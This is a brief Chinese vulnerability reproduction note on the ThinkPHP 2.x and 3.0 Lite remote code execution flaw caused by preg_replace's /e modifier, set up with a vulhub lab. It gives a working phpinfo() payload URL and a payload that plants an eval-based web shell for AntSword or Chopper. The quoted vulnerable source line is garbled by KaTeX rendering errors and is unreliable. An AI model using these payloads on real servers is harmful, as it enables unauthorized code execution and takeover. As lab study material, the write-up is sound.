漏洞描述
ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:
KaTeX parse error: Undefined control sequence: \w at position 23: …reg_replace('@(\̲w̲+)'.depr.’([^’.KaTeX parse error: Undefined control sequence: \/ at position 7: depr.'\̲/̲]+)@e', 'var[’\1’]="\2";’, implode( d e p r , depr, depr,paths));
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
环境搭建
搭建链接:https://github.com/vulhub/vulhub/tree/master/thinkphp/2-rce
漏洞复现
1、使用payload 直接访问,即可执行phpinfo():
http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D
2、利用该漏洞getshell,下面给出一个能够直接蚁剑(菜刀)连接的payload:
/index.php?s=a/b/c/${@print(eval($_POST[1]))}
参考链接
https://www.freebuf.com/column/223149.html